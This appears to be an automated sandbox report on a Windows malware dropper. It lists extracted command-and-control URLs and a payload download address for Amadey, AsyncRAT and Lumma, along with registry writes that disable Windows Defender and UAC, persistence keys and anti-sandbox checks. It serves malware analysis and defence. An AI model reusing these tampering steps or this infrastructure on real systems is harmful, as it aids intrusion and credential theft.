Analysis
max time kernel: 150s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20250313-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250313-en, locale:en-us, os:windows10-2004-x64, system
submitted: 14/03/2025, 04:43
Static task: static1
Behavioral task: behavioral1
Sample: 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe
Resource: win7-20240903-en
Behavioral task: behavioral2
Sample: 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe
Resource: win10v2004-20250313-en
General
Target: 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe
Size: 938KB
MD5: 23abb2c0ef0f3dc30270a9afd6b27530
SHA1: aa4fd27820b03a511ebac7b3ee05a95dce3c2c52
SHA256: 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373
SHA512: 2f194dea83725bf08837c0ac938efaf015a079f7c59f90e770efec2553f75e2e2cedf899575e5b9194a7b99378177194302cbb2acc9f80557dce5eace5216b8d
SSDEEP: 24576:5qDEvCTbMWu7rQYlBQcBiT6rprG8a0Xu:5TvC/MTQYxsWR7a0X
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
install_dir: bb556cff4a
install_file: rapes.exe
strings_key: a131b127e996a898cd19ffb2d92e481b
url_paths: /Ni9kiput/index.php
Extracted
lumma
Extracted
asyncrat
Controller
Default
20.206.204.9:4449
ammmjprqjnqswrieh
delay: 1
install: false
install_folder: %AppData%
Extracted
lumma
https://moderzysics.top/api
Signatures
Amadey family
Asyncrat family
Lumma family
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" powershell.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" powershell.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 1 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection powershell.exe -
StormKitty
StormKitty is an open source info stealer written in C#.
-
StormKitty payload 2 IoCs
resource yara_rule behavioral2/memory/6728-24327-0x000000001E4C0000-0x000000001E5D2000-memory.dmp family_stormkitty behavioral2/memory/5968-24536-0x0000000001100000-0x0000000001404000-memory.dmp family_stormkitty -
Stormkitty family
-
Suspicious use of NtCreateUserProcessOtherParentProcess 5 IoCs
description pid Process procid_target PID 4720 created 3460 4720 Seat.com 54 PID 4720 created 3460 4720 Seat.com 54 PID 8156 created 680 8156 powershell.exe 7 PID 8176 created 680 8176 powershell.exe 7 PID 4824 created 680 4824 powershell.exe 7 -
UAC bypass 3 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" D9ohTv4jcH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" D9ohTv4jcH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" D9ohTv4jcH.exe -
resource yara_rule behavioral2/files/0x0007000000024452-24235.dat VenomRAT behavioral2/memory/6728-24247-0x0000000000BD0000-0x0000000000BE8000-memory.dmp VenomRAT behavioral2/memory/5968-24536-0x0000000001100000-0x0000000001404000-memory.dmp VenomRAT -
Venomrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral2/files/0x0007000000024452-24235.dat family_asyncrat -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 8 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ v6Oqdnc.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 4625c3eb40.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe -
Blocklisted process makes network request 4 IoCs
flow pid Process 10 1804 powershell.exe 15 1928 powershell.exe 20 5096 powershell.exe 98 12600 wscript.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 15 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 8180 powershell.exe 2444 powershell.exe 1804 powershell.exe 1928 powershell.exe 5096 powershell.exe 4708 powershell.exe 1404 powershell.exe 3876 powershell.exe 1376 powershell.exe 3308 powershell.exe 6192 powershell.exe 9592 powershell.exe 9956 powershell.exe 10112 powershell.exe 10372 powershell.exe -
Downloads MZ/PE file 21 IoCs
flow pid Process 98 12600 wscript.exe 150 3596 rapes.exe 10 1804 powershell.exe 20 5096 powershell.exe 135 3596 rapes.exe 143 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 14 3596 rapes.exe 43 3852 svchost.exe 138 8104 svchost.exe 15 1928 powershell.exe -
Checks BIOS information in registry 2 TTPs 16 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 4625c3eb40.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion v6Oqdnc.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 4625c3eb40.exe -
Checks computer location settings 2 TTPs 12 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation st22BJg.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation wscript.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation rapes.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation ADFoyxP.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation file.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation mshta.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation Go7yA2t.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation zY9sqWs.exe Key value queried \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Control Panel\International\Geo\Nation D9ohTv4jcH.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TradeHub.url cmd.exe -
Executes dropped EXE 44 IoCs
pid Process 4676 TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE 3596 rapes.exe 2480 2af4a002ad.exe 2856 Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE 752 XW3ITet.exe 2616 gtjFHJI.exe 3732 483d2fa8a0d53818306efeb32d3.exe 4576 Go7yA2t.exe 2268 rapes.exe 2204 9CQknW9.exe 1916 h2wb5_002.exe 456 dbs.exe 2028 dbs.exe 12908 HmngBpR.exe 13032 SplashWin.exe 13144 SplashWin.exe 4024 zY9sqWs.exe 1724 Gxtuum.exe 3948 ADFoyxP.exe 6416 9JFiKVm.exe 6728 D9ohTv4jcH.exe 4720 Seat.com 11944 rapes.exe 12256 Gxtuum.exe 12452 st22BJg.exe 12704 file.exe 6604 ShortcutTaskAgent.exe 6764 ShortcutTaskAgent.exe 6936 7BzCs1a.exe 6876 7BzCs1a.exe 6392 Security Protection Windows.pif 6212 OpenCL.pif 5968 RegAsm.exe 11336 v6Oqdnc.exe 9896 OpenCL.pif 7468 eAzoDbY.exe 7576 eAzoDbY.exe 8004 8sb9w_003.exe 8368 XW3ITet.exe 8492 ps.exe 8536 cls.exe 8684 b8815974b5.exe 8736 b8815974b5.exe 9220 4625c3eb40.exe -
Identifies Wine through registry keys 2 TTPs 8 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine v6Oqdnc.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 4625c3eb40.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\Software\Wine rapes.exe -
Loads dropped DLL 23 IoCs
pid Process 13032 SplashWin.exe 13032 SplashWin.exe 13032 SplashWin.exe 13144 SplashWin.exe 13144 SplashWin.exe 13144 SplashWin.exe 6604 ShortcutTaskAgent.exe 6604 ShortcutTaskAgent.exe 6604 ShortcutTaskAgent.exe 6604 ShortcutTaskAgent.exe 6604 ShortcutTaskAgent.exe 6604 ShortcutTaskAgent.exe 6604 ShortcutTaskAgent.exe 6604 ShortcutTaskAgent.exe 6764 ShortcutTaskAgent.exe 6764 ShortcutTaskAgent.exe 6764 ShortcutTaskAgent.exe 6764 ShortcutTaskAgent.exe 6764 ShortcutTaskAgent.exe 6764 ShortcutTaskAgent.exe 6764 ShortcutTaskAgent.exe 6764 ShortcutTaskAgent.exe 8436 pluginfast_Yj.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Unsecured Credentials: Credentials In Files 1 TTPs
Steal credentials from unsecured files.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2af4a002ad.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10205910101\\2af4a002ad.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10205920121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{72BDFAD0-4420-47FB-9C89-9154DED998EB} = "C:\\ProgramData\\{DAC8D1F9-5E77-4EE7-B778-B19F65DAAE06}\\netbtugc.exe {0A8DF263-7B68-4A06-9AA8-2351D08B8A79}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{72BDFAD0-4420-47FB-9C89-9154DED998EB} = "C:\\ProgramData\\{DAC8D1F9-5E77-4EE7-B778-B19F65DAAE06}\\netbtugc.exe {0A8DF263-7B68-4A06-9AA8-2351D08B8A79}" svchost.exe Set value (str) \REGISTRY\USER\S-1-5-21-1279544337-3716153908-718418795-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{F1A8D70E-81F9-4200-B46C-ECA432751942} = "C:\\ProgramData\\{044B9118-D09F-44DE-8820-983AA965DB95}\\dmcertinst.exe {65ECE49D-E44B-4E45-9F95-675677E13036}" svchost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{F1A8D70E-81F9-4200-B46C-ECA432751942} = "C:\\ProgramData\\{044B9118-D09F-44DE-8820-983AA965DB95}\\dmcertinst.exe {65ECE49D-E44B-4E45-9F95-675677E13036}" svchost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua D9ohTv4jcH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" D9ohTv4jcH.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x00070000000243dd-54.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 2 IoCs
pid Process 3504 tasklist.exe 6208 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 8 IoCs
pid Process 4676 TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE 3596 rapes.exe 2856 Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE 3732 483d2fa8a0d53818306efeb32d3.exe 2268 rapes.exe 11944 rapes.exe 11336 v6Oqdnc.exe 9220 4625c3eb40.exe -
Suspicious use of SetThreadContext 7 IoCs
description pid Process procid_target PID 2616 set thread context of 5328 2616 gtjFHJI.exe 120 PID 13144 set thread context of 13240 13144 SplashWin.exe 143 PID 6416 set thread context of 4444 6416 9JFiKVm.exe 158 PID 6936 set thread context of 6876 6936 7BzCs1a.exe 235 PID 6764 set thread context of 5096 6764 ShortcutTaskAgent.exe 230 PID 7468 set thread context of 7576 7468 eAzoDbY.exe 249 PID 8684 set thread context of 8736 8684 b8815974b5.exe 262 -
resource yara_rule behavioral2/files/0x000700000002446b-24429.dat upx behavioral2/memory/12452-24437-0x0000000000B00000-0x000000000160B000-memory.dmp upx behavioral2/memory/12452-24502-0x0000000000B00000-0x000000000160B000-memory.dmp upx behavioral2/memory/6392-24522-0x00000000001E0000-0x0000000000686000-memory.dmp upx behavioral2/memory/6392-24584-0x00000000001E0000-0x0000000000686000-memory.dmp upx -
Drops file in Windows directory 9 IoCs
description ioc Process File opened for modification C:\Windows\HighKerry ADFoyxP.exe File opened for modification C:\Windows\PracticalPrevent ADFoyxP.exe File opened for modification C:\Windows\FilenameWho ADFoyxP.exe File opened for modification C:\Windows\UpdatedMakeup ADFoyxP.exe File opened for modification C:\Windows\AccreditationShed ADFoyxP.exe File created C:\Windows\Tasks\rapes.job TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE File created C:\Windows\Tasks\Gxtuum.job zY9sqWs.exe File opened for modification C:\Windows\PerfectlyFda ADFoyxP.exe File opened for modification C:\Windows\GovernmentsHighly ADFoyxP.exe -
Launches sc.exe 9 IoCs
Sc.exe is a Windows utility to control services on the system.
pid Process 11008 sc.exe 2396 sc.exe 8868 sc.exe 11064 sc.exe 4500 sc.exe 11664 sc.exe 11784 sc.exe 8844 sc.exe 8892 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
pid pid_target Process procid_target 4052 2204 WerFault.exe 127 7248 5968 WerFault.exe 223 7692 7468 WerFault.exe 247 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (64 rows; the description and ioc columns are identical in every row, the Process column reads, in order): 483d2fa8a0d53818306efeb32d3.exe, SplashWin.exe, RegAsm.exe, Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE, schtasks.exe, cmd.exe, findstr.exe, powershell.exe, cmd.exe, XW3ITet.exe, MSBuild.exe, extrac32.exe, 7BzCs1a.exe, eAzoDbY.exe, cmd.exe, schtasks.exe, powershell.exe, MSBuild.exe, cmd.exe, zY9sqWs.exe, tasklist.exe, b8815974b5.exe, cmd.exe, powershell.exe, v6Oqdnc.exe, 4625c3eb40.exe, TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE, rapes.exe, 2af4a002ad.exe, powershell.exe, Gxtuum.exe, ADFoyxP.exe, cmd.exe, explorer.exe, cmd.exe, cmd.exe, choice.exe, cmd.exe, cmd.exe, cmd.exe, 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe, mshta.exe, ShortcutTaskAgent.exe, findstr.exe, b8815974b5.exe, schtasks.exe, file.exe, timeout.exe, mshta.exe, SplashWin.exe, 7BzCs1a.exe, eAzoDbY.exe, 8sb9w_003.exe, 9CQknW9.exe, expand.exe, ShortcutTaskAgent.exe, mshta.exe, cmd.exe, powershell.exe, tasklist.exe, findstr.exe, cmd.exe, Seat.com, powershell.exe
Delays execution with timeout.exe 1 IoCs
pid Process 5688 timeout.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" powershell.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" powershell.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe
Runs net.exe
-
Scheduled Task/Job: Scheduled Task 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 7352 schtasks.exe 6108 schtasks.exe 5712 schtasks.exe 1188 schtasks.exe 4276 schtasks.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 98 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 9480 explorer.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1804 powershell.exe 1804 powershell.exe 4676 TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE 4676 TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE 3596 rapes.exe 3596 rapes.exe 1928 powershell.exe 1928 powershell.exe 1404 powershell.exe 1404 powershell.exe 2856 Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE 2856 Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE 3876 powershell.exe 3876 powershell.exe 1376 powershell.exe 1376 powershell.exe 3308 powershell.exe 3308 powershell.exe 5096 powershell.exe 5096 powershell.exe 5328 MSBuild.exe 5328 MSBuild.exe 5328 MSBuild.exe 5328 MSBuild.exe 3732 483d2fa8a0d53818306efeb32d3.exe 3732 483d2fa8a0d53818306efeb32d3.exe 5328 MSBuild.exe 5328 MSBuild.exe 5328 MSBuild.exe 5328 MSBuild.exe 4708 powershell.exe 4708 powershell.exe 2268 rapes.exe 2268 rapes.exe 2444 powershell.exe 2444 powershell.exe 12908 HmngBpR.exe 12908 HmngBpR.exe 13032 SplashWin.exe 13144 SplashWin.exe 13144 SplashWin.exe 13144 SplashWin.exe 13240 cmd.exe 13240 cmd.exe 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 